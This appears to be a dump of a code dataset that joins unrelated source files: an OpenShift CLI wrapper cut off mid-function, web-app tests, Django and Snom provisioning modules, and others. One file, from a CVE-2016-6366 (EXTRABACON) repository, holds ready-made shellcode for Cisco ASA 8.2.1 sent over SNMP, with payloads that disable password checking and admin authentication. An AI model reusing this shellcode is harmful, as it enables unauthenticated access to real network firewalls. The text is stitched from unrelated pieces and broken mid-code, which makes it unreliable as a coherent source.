# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
import atexit
import json
import os
import re
import shutil
import subprocess
import ruamel.yaml as yaml
#import yaml
#
## This is here because of a bug that causes yaml
## to incorrectly handle timezone info on timestamps
#def timestamp_constructor(_, node):
# '''return timestamps as strings'''
# return str(node.value)
#yaml.add_constructor(u'tag:yaml.org,2002:timestamp', timestamp_constructor)
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = kubeconfig
self.all_namespaces = all_namespaces
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = '/tmp/%s' % rname
yed = Yedit(fname, res['results'][0], separator=sep)
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''return all pods '''
cmd = ['-n', self.namespace, 'replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''return all pods '''
fname = '/tmp/%s' % rname
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''return all pods '''
return self.openshift_cmd(['create', '-f', fname, '-n', self.namespace])
def _delete(self, resource, rname, selector=None):
'''return all pods '''
cmd = ['delete', resource, rname, '-n', self.namespace]
if selector:
cmd.append('--selector=%s' % selector)
return self.openshift_cmd(cmd)
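    # Illustrative (not part of the original source):
    #   self._delete('secret', 'mysecret', selector='app=web')
    # runs: oc delete secret mysecret -n <namespace> --selector=app=web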
def _process(self, template_name, create=False, params=None, template_data=None):
'''return all pods '''
cmd = ['process', '-n', self.namespace]
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["%s=%s" % (key, value) for key, value in params.items()]
cmd.append('-v')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = '/tmp/%s' % template_name
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['-n', self.namespace, 'create', '-f', fname])
def _get(self, resource, rname=None, selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector:
cmd.append('--selector=%s' % selector)
if self.all_namespaces:
cmd.extend(['--all-namespaces'])
elif self.namespace:
cmd.extend(['-n', self.namespace])
cmd.extend(['-o', 'json'])
if rname:
cmd.append(rname)
rval = self.openshift_cmd(cmd, output=True)
        # Ensure results are returned in an array
if rval.has_key('items'):
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
cmd.append('--schedulable=%s' % schedulable)
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
        cmd.extend(['--list-pods', '-o', 'json'])
        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
#pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
if grace_period:
cmd.append('--grace-period=%s' % int(grace_period))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
#pylint: disable=too-many-arguments
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = []
if oadm:
cmds = ['/usr/bin/oc', 'adm']
else:
cmds = ['/usr/bin/oc']
cmds.extend(cmd)
rval = {}
results = ''
err = None
if self.verbose:
print ' '.join(cmds)
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={'KUBECONFIG': self.kubeconfig})
stdout, stderr = proc.communicate(input_data)
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
if proc.returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.message:
err = err.message
elif output_type == 'raw':
|
tiborsimko/analysis-preservation.cern.ch
|
tests/integration/test_delete_deposit.py
|
Python
|
gpl-2.0
| 7,407
| 0.00243
|
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2017 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Integration tests for deleting deposits."""
import json
# #######################################
# # api/deposits/{pid} [DELETE]
# #######################################
def test_delete_deposit_with_non_existing_pid_returns_404(app,
auth_headers_for_superuser):
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format('non-existing-pid'),
headers=auth_headers_for_superuser)
assert resp.status_code == 404
def test_delete_deposit_when_user_has_no_permission_returns_403(app,
users,
create_deposit,
auth_headers_for_user):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
other_user_headers = auth_headers_for_user(users['lhcb_user2'])
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=other_user_headers)
assert resp.status_code == 403
def test_delete_deposit_when_user_is_owner_can_delete_his_deposit(app,
users,
create_deposit,
json_headers,
auth_headers_for_user):
owner = users['lhcb_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
headers = auth_headers_for_user(owner) + json_headers
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=headers)
assert resp.status_code == 204
# deposit not existing anymore
resp = client.get('/deposits/{}'.format(deposit['_deposit']['id']),
headers=headers)
assert resp.status_code == 410
def test_delete_deposit_when_deposit_published_already_cant_be_deleted(app,
users,
create_deposit,
json_headers,
auth_headers_for_user):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
headers = auth_headers_for_user(users['lhcb_user']) + json_headers
pid = deposit['_deposit']['id']
with app.test_client() as client:
resp = client.post('/deposits/{}/actions/publish'.format(pid),
headers=headers)
resp = client.delete('/deposits/{}'.format(pid),
headers=headers)
assert resp.status_code == 403
# deposit not removed
resp = client.get('/deposits/{}'.format(pid),
headers=headers)
assert resp.status_code == 200
def test_delete_deposit_when_superuser_can_delete_others_deposit(app,
users,
create_deposit,
auth_headers_for_superuser):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_superuser)
assert resp.status_code == 204
def test_delete_deposit_when_user_with_admin_access_can_delete(app,
users,
create_deposit,
auth_headers_for_user,
json_headers):
owner, other_user = users['lhcb_user'], users['cms_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
permissions = [{
'email': other_user.email,
'type': 'user',
'op': 'add',
'action': 'deposit-admin'
}]
with app.test_client() as client:
# give other user read/write access
resp = client.post('/deposits/{}/actions/permissions'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(owner) + json_headers,
data=json.dumps(permissions))
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 204
def test_delete_deposit_when_user_only_with_read_write_access_returns_403(app,
users,
create_deposit,
auth_headers_for_user,
json_headers):
owner, other_user = users['lhcb_user'], users['cms_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
permissions = [{
'email': other_user.email,
'type': 'user',
'op': 'add',
        'action': 'deposit-read'
    }, {
        'email': other_user.email,
        'type': 'user',
        'op': 'add',
'action': 'deposit-update'
}]
with app.test_client() as client:
# give other user read/write access
resp = client.post('/deposits/{}/actions/permissions'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(owner) + json_headers,
data=json.dumps(permissions))
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 403
|
BrandonBaucher/website-optimization
|
dummy_backend.py
|
Python
|
mit
| 1,866
| 0.009646
|
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
success = 0
    total = 0
def do_GET(self):
request_path = self.path
print("\n----- Request Start ----->\n")
print(request_path)
print(self.headers)
print("<----- Request End -----\n")
self.send_response(200)
self.send_header("Set-Cookie", "foo=bar")
def do_POST(self):
request_path = self.path
print("\n----- Request Start ----->\n")
# print(request_path)
#
request_headers = self.headers
        content_length = request_headers.getheaders('content-length')
length = int(content_length[0]) if content_length else 0
        # print(request_headers)
print(self.rfile.read(length))
"""
r = self.rfile.read(length).split('=')[-1]
print r
if r == 'true':
success += 1
total +=1
else:
total +=1
print success
print total
        print ''
"""
print("<----- Request End -----\n")
        self.send_response(200)
        self.end_headers()  # terminate the header block so the response is completed
do_PUT = do_POST
do_DELETE = do_GET
def main():
port = 8080
print('Listening on localhost:%s' % port)
server = HTTPServer(('', port), RequestHandler)
server.serve_forever()
if __name__ == "__main__":
parser = OptionParser()
parser.usage = ("Creates an http-server that will echo out any GET or POST parameters\n"
"Run:\n\n"
" reflect")
(options, args) = parser.parse_args()
main()
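# Illustrative usage (not in the original script): with the server running,
#   curl -X POST -d 'passed=true' http://localhost:8080/echo
# makes the handler print the request banner and the raw request body
# ("passed=true") to the console; the parameter name is arbitrary.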
|
rebost/django
|
django/contrib/gis/gdal/__init__.py
|
Python
|
bsd-3-clause
| 2,164
| 0.001386
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may be desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.datasource import DataSource
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, gdal_release_date, GEOJSON, GDAL_VERSION
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform
from django.contrib.gis.gdal.geometries import OGRGeometry
HAS_GDAL = True
except:
HAS_GDAL, GEOJSON = False, False
try:
from django.contrib.gis.gdal.envelope import Envelope
except ImportError:
# No ctypes, but don't raise an exception.
pass
from django.contrib.gis.gdal.error import check_err, OGRException, OGRIndexError, SRSException
from django.contrib.gis.gdal.geomtype import OGRGeomType
|
SINGROUP/pycp2k
|
pycp2k/classes/_restart14.py
|
Python
|
lgpl-3.0
| 665
| 0.003008
|
from pycp2k.inputsection import InputSection
from ._each406 import _each406
class _restart14(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Section_parameters = None
self.Add_last = None
self.Common_iteration_levels = None
self.Filename = None
self.Log_print_key = None
self.EACH = _each406()
self._name = "RESTART"
self._keywords = {'Log_print_key': 'LOG_PRINT_KEY', 'Filename': 'FILENAME', 'Add_last': 'ADD_LAST', 'Common_iteration_levels': 'COMMON_ITERATION_LEVELS'}
self._subsections = {'EACH': 'EACH'}
        self._attributes = ['Section_parameters']
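# Illustrative usage (not part of the generated source): keyword attributes map
# onto CP2K input keywords via self._keywords, e.g.
#   restart = _restart14()
#   restart.Add_last = "NUMERIC"
#   restart.Filename = "restart"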
|
bx5974/sikuli
|
sikuli-ide/sample-scripts/resize-app.sikuli/resize-app.py
|
Python
|
mit
| 380
| 0.018421
|
def resizeApp(app, dx, dy):
switchApp(app)
corner = find(Pattern("1273159241516.png").targetOffset(3,14))
    dragDrop(corner, corner.getCenter().offset(dx, dy))
resizeApp("Safari", 50,
|
50)
# exists("1273159241516.png")
# click(Pattern("1273159241516.png").targetOffset(3,14).similar(0.7).firstN(2))
# with Region(10,100,300,300):
# pass
# click("__SIKULI-CAPTURE-BUTTON__")
|
MuhammadSohaib/colorado-geology-geodjango
|
geology/geology/wsgi.py
|
Python
|
mit
| 1,562
| 0.00064
|
"""
WSGI config for geology project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geology.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
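# Illustrative (not in the original file): any WSGI server can serve this
# module, e.g. with gunicorn:
#   gunicorn geology.wsgi:application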
|
RiskSense-Ops/CVE-2016-6366
|
extrabacon-2.0/versions/shellcode_asa821.py
|
Python
|
mit
| 4,530
| 0.003311
|
#
# this file autogenerated, do not touch
#
vers = "asa821"
my_ret_addr_len = 4
my_ret_addr_byte = "\x93\xf2\x2b\x09"
my_ret_addr_snmp = "147.242.43.9"
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"
preamble_len = 41
preamble_byte = "\xb8\xc9\x3f\x10\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60"
preamble_snmp = "184.201.63.16.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96"
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"
successmsg_len = 19
successmsg_byte = "\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58"
successmsg_snmp = "184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88"
launcher_len = 11
launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0"
launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208"
payload_nop_len = 116
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88.195"
payload_PMCHECK_DISABLE_len = 66
payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_PMCHECK_ENABLE_len = 66
payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_PMCHECK_ENABLE_snmp = "235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_AAAADMINAUTH_ENABLE_len = 66
payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
|
docteurmicro50/xivo-provd-plugins
|
plugins/xivo-snom/common/common.py
|
Python
|
gpl-3.0
| 15,004
| 0.001333
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010-2015 Avencall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
import logging
import os.path
import re
from operator import itemgetter
from xml.sax.saxutils import escape
from provd import tzinform
from provd import synchronize
from provd.devices.config import RawConfigError
from provd.devices.pgasso import BasePgAssociator, IMPROBABLE_SUPPORT, \
PROBABLE_SUPPORT, FULL_SUPPORT, NO_SUPPORT, COMPLETE_SUPPORT
from provd.plugins import StandardPlugin, FetchfwPluginHelper, \
TemplatePluginHelper
from provd.servers.http import HTTPNoListingFileService
from provd.util import norm_mac, format_mac
from twisted.internet import defer, threads
logger = logging.getLogger('plugin.xivo-snom')
class BaseSnomHTTPDeviceInfoExtractor(object):
_UA_REGEX = re.compile(r'\bsnom(\w+)-SIP ([\d.]+)')
_PATH_REGEX = re.compile(r'\bsnom\w+-([\dA-F]{12})\.htm$')
def extract(self, request, request_type):
return defer.succeed(self._do_extract(request))
def _do_extract(self, request):
ua = request.getHeader('User-Agent')
if ua:
dev_info = self._extract_from_ua(ua)
if dev_info:
self._extract_from_path(request.path, dev_info)
return dev_info
return None
def _extract_from_ua(self, ua):
# HTTP User-Agent:
# "Mozilla/4.0 (compatible; snom lid 3605)" --> Snom 6.5.xx
# "Mozilla/4.0 (compatible; snom320-SIP 6.5.20; snom320 jffs2 v3.36; snom320 linux 3.38)"
# "Mozilla/4.0 (compatible; snom320-SIP 7.3.30 1.1.3-u)"
# "Mozilla/4.0 (compatible; snom320-SIP 8.4.18 1.1.3-s)"
# "Mozilla/4.0 (compatible; snom710-SIP 8.7.3.19 1.1.5-IFX-05.01.12)"
# "Mozilla/4.0 (compatible; snom760-SIP 8.7.3.19 2010.06)"
# "Mozilla/4.0 (compatible; snom820-SIP 8.4.35 1.1.4-IFX-26.11.09)"
# "Mozilla/4.0 (compatible; snom870-SIP 8.4.35 SPEAr300 SNOM 1.4)"
# "Mozilla/4.0 (compatible; snomPA1-SIP 8.4.35 1.1.3-s)"
m = self._UA_REGEX.search(ua)
if m:
raw_model, raw_version = m.groups()
return {u'vendor': u'Snom',
u'model': raw_model.decode('ascii'),
u'version': raw_version.decode('ascii')}
return None
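    # Illustrative (not part of the original source): for the User-Agent
    # "Mozilla/4.0 (compatible; snom320-SIP 8.4.18 1.1.3-s)" the regex above
    # yields {u'vendor': u'Snom', u'model': u'320', u'version': u'8.4.18'}.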
def _extract_from_path(self, path, dev_info):
m = self._PATH_REGEX.search(path)
if m:
raw_mac = m.group(1)
            dev_info[u'mac'] = norm_mac(raw_mac.decode('ascii'))
class BaseSnomPgAssociator(BasePgAssociator):
    def __init__(self, models, version):
self._models = models
self._version = version
def _do_associate(self, vendor, model, version):
if vendor == u'Snom':
if version is None:
# Could be an old version with no XML support
return PROBABLE_SUPPORT
assert version is not None
if self._is_incompatible_version(version):
return NO_SUPPORT
if model in self._models:
if version == self._version:
return FULL_SUPPORT
return COMPLETE_SUPPORT
return PROBABLE_SUPPORT
return IMPROBABLE_SUPPORT
def _is_incompatible_version(self, version):
try:
maj_version = int(version[0])
if maj_version < 7:
return True
except (IndexError, ValueError):
pass
return False
class BaseSnomPlugin(StandardPlugin):
_ENCODING = 'UTF-8'
_LOCALE = {
u'de_DE': (u'Deutsch', u'GER'),
u'en_US': (u'English', u'USA'),
u'es_ES': (u'Espanol', u'ESP'),
u'fr_FR': (u'Francais', u'FRA'),
u'fr_CA': (u'Francais', u'USA'),
u'it_IT': (u'Italiano', u'ITA'),
u'nl_NL': (u'Dutch', u'NLD'),
}
_SIP_DTMF_MODE = {
u'RTP-in-band': u'off',
u'RTP-out-of-band': u'off',
u'SIP-INFO': u'sip_info_only'
}
_XX_DICT_DEF = u'en'
_XX_DICT = {
u'en': {
u'remote_directory': u'Directory',
},
u'fr': {
u'remote_directory': u'Annuaire',
},
}
def __init__(self, app, plugin_dir, gen_cfg, spec_cfg):
StandardPlugin.__init__(self, app, plugin_dir, gen_cfg, spec_cfg)
self._tpl_helper = TemplatePluginHelper(plugin_dir)
downloaders = FetchfwPluginHelper.new_downloaders(gen_cfg.get('proxies'))
fetchfw_helper = FetchfwPluginHelper(plugin_dir, downloaders)
self.services = fetchfw_helper.services()
self.http_service = HTTPNoListingFileService(self._tftpboot_dir)
http_dev_info_extractor = BaseSnomHTTPDeviceInfoExtractor()
def _common_templates(self):
yield ('common/gui_lang.xml.tpl', 'gui_lang.xml')
yield ('common/web_lang.xml.tpl', 'web_lang.xml')
for tpl_format, file_format in [('common/snom%s.htm.tpl', 'snom%s.htm'),
('common/snom%s.xml.tpl', 'snom%s.xml'),
('common/snom%s-firmware.xml.tpl', 'snom%s-firmware.xml')]:
for model in self._MODELS:
yield tpl_format % model, file_format % model
def configure_common(self, raw_config):
for tpl_filename, filename in self._common_templates():
tpl = self._tpl_helper.get_template(tpl_filename)
dst = os.path.join(self._tftpboot_dir, filename)
self._tpl_helper.dump(tpl, raw_config, dst, self._ENCODING)
def _update_sip_lines(self, raw_config):
proxy_ip = raw_config.get(u'sip_proxy_ip')
backup_proxy_ip = raw_config.get(u'sip_backup_proxy_ip')
voicemail = raw_config.get(u'exten_voicemail')
for line in raw_config[u'sip_lines'].itervalues():
if proxy_ip:
line.setdefault(u'proxy_ip', proxy_ip)
if backup_proxy_ip:
line.setdefault(u'backup_proxy_ip', backup_proxy_ip)
if voicemail:
line.setdefault(u'voicemail', voicemail)
def _get_fkey_domain(self, raw_config):
# Return None if there's no usable domain
if u'sip_proxy_ip' in raw_config:
return raw_config[u'sip_proxy_ip']
else:
lines = raw_config[u'sip_lines']
if lines:
return lines[min(lines.iterkeys())][u'proxy_ip']
return None
def _add_fkeys(self, raw_config, model):
domain = self._get_fkey_domain(raw_config)
if domain is None:
if raw_config[u'funckeys']:
logger.warning('Could not set funckeys: no domain part')
else:
lines = []
for funckey_no, funckey_dict in sorted(raw_config[u'funckeys'].iteritems(),
key=itemgetter(0)):
funckey_type = funckey_dict[u'type']
if funckey_type == u'speeddial':
type_ = u'speed'
suffix = ''
elif funckey_type == u'park':
if model in ['710', '720', '715', '760']:
type_ = u'orbit'
suffix = ''
else:
type_ = u'speed'
suffix = ''
elif funckey_type == u'blf':
if u'exten_pickup_call' in raw_config:
type_ = u'blf'
suffix = '|%s' % raw_config[u'exten_pickup_call']
else:
|
immstudios/firefly
|
proxyplayer/videoplayer.py
|
Python
|
gpl-3.0
| 9,818
| 0.000204
|
#!/usr/bin/env python3
import functools
from nxtools import logging, log_traceback
from .utils import (
Qt,
QWidget,
QSlider,
QTimer,
QHBoxLayout,
QVBoxLayout,
QIcon,
RegionBar,
TimecodeWindow,
get_navbar,
)
try:
from .mpv import MPV
has_mpv = True
except OSError:
has_mpv = False
log_traceback()
logging.warning(
"Unable to load MPV libraries. Video preview will not be available."
)
class DummyPlayer:
def property_observer(self, *args):
return lambda x: x
def __setitem__(self, key, value):
return
def __getitem__(self, key):
return
def play(self, *args, **kwargs):
pass
def seek(self, *args, **kwargs):
pass
def frame_step(self, *args, **kwargs):
pass
